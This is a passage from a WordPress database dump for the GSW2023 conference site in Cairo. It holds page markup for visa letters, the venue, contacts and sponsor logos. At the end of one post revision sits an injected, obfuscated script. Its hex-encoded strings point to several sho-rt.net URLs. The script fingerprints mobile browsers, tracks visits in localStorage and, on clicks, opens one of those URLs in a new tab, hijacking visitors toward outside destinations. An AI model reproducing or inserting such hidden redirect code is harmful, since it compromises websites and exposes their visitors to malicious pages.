you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:43:47','2023-08-13 03:43:47','',3066,'https://gsw2023.com/?p=5092',0,'revision','',0),
(5093,1,'2023-08-13 03:47:02','2023-08-13 03:47:02','','MBRSC LOGO_1-01','','inherit','open','closed','','mbrsc-logo_1-01','','','2023-08-13 03:47:02','2023-08-13 03:47:02','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01.png',0,'attachment','image/png',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5094,1,'2023-08-13 03:48:03','2023-08-13 03:48:03','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" 